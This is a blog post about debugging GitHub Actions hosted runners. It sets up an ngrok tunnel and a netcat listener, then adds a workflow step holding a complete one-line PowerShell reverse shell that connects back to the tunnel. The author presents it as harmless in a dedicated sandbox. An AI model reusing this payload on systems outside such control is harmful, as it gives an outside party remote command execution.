Debugging Github Actions on Hosted Runners

Sat, Sep 11, 2021 4-minute read

If you have worked with CI/CD tools like Azure Pipelines or GitHub Actions, I am sure you must have encountered situations where “it works on your machine, but not on the hosted runner/agent”. Rarely a pipeline works on the first run. Even if that’s the case, it is too good to be true. I found myself spending a lot of time troubleshooting pipelines/workflows until I get them right. Once I get them right, the journey from there is usually smooth. Do what hurts the most, often, right? and you will get better at it.

However, this troubleshooting could get really complicated and there were many times I wished we had some tooling support to debug our pipelines. If you are using self-hosted runners, this is not so much a problem because you have access to the runner environment. GitHub hosted runners, however, makes things a lot more complicated. They are short-lived ephemeral VMs that are provisioned just for the pipeline run and destroyed soon after.

So, here’s a technique that will allow you to, put a breakpoint in your workflow so that when the workflow hits the breakpoint, you can get a remote shell into the runner. Once you’ve got remote shell access, opportunities are endless.

Client/Developer Machine Setup

All you need is a Linux machine with nc utility. Netcat (nc) is a Linux tool that allows you to deal with low-level streams with a lot of flexibility. If you are on Windows, WSL2 should work as well. Here are the steps:

  1. Install ngrok utility
    If you haven’t used ngrok before, refer to the instructions here to download ngrok. Its a simple utility that allows you to forward a port over a local tunnel into an internet-accessible endpoint. You may also need to set up an authcode so that you can forward raw TCP connections.

  2. Forward a local port with ngrok
    We are going to use nc to listen on a local port to get a reverse shell into the runner. So, run below on a new terminal to forward the local port 443 with ngrok:

    ./ngrok tcp 443

Note: note down the remote internet server name and port, because you will need that later (as shown below)

Forwarding                    tcp://x.tcp.ngrok.io:12345 -> localhost:443
  1. Listen on 443 for the reverse shell
    Use nc to listen in on port 443 for the reverse shell connection from the hosted runner on a new terminal window.
    nc -lvp 443

Breakpoint on the workflow/pipeline

We call it breakpoint, but its really a PowerShell action/step that causes the workflow to pause and initiate the reverse shell connection. Include below step/action anywhere in your workflow that you would like it to pause. Be sure to include correct remote server name and port below, from the ngrok command above step #2.

  - name: reverse shell
    run: |
    $client = New-Object System.Net.Sockets.TCPClient('<ngrok-remote-name>',<ngrok-remote-port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
    shell: pwsh

That’s it. Run the workflow and you will notice it pauses at the ‘reverse shell’ action. Now, you won’t notice it but you have got a reverse shell into the hosted runner on the terminal window you ran nc. Try typing ls and hit enter on that terminal, you will see the output from the runner. Now, you got yourself a shell for any troubleshooting you may want to do. Once you are done, exit nc command and the workflow will resume.

Did we just hack the hosted runner?

Yes and No. If you run that PowerShell snippet to initiate the reverse shell on your Windows machine, Defender will block it and say it prevented malicious code. Besides, anyone with a decent understanding on security would freak out when they hear the term “reverse shell”. Yes, it is a hacking technique, but in our situation its completely harmless use; if you know how runners/agents work. GitHub Actions runners or Azure Pipelines agents are short-lived VMs created just for you, just for the duration of that pipeline run. So, you are allowed to run arbitrary code and probably why the Defender is not running there in the first place. So, no we didn’t hack into the runner, because its a complete sandbox dedicated to my pipeline run.

Although, above predominantly talks about GitHub Actions, the technique works for Azure Pipelines as well. Hope this helps.

Similar Solutions:

  • Debugging with tmate Action: Looks simple enough, but relies on tmate which is similar to ngrok+nc combination.
  • Debug via SSH Action: Instead of a reverse shell, it seems to use SSH forwarding. I was unsure if it works on Windows runners, but the action claims it works on Windows as well.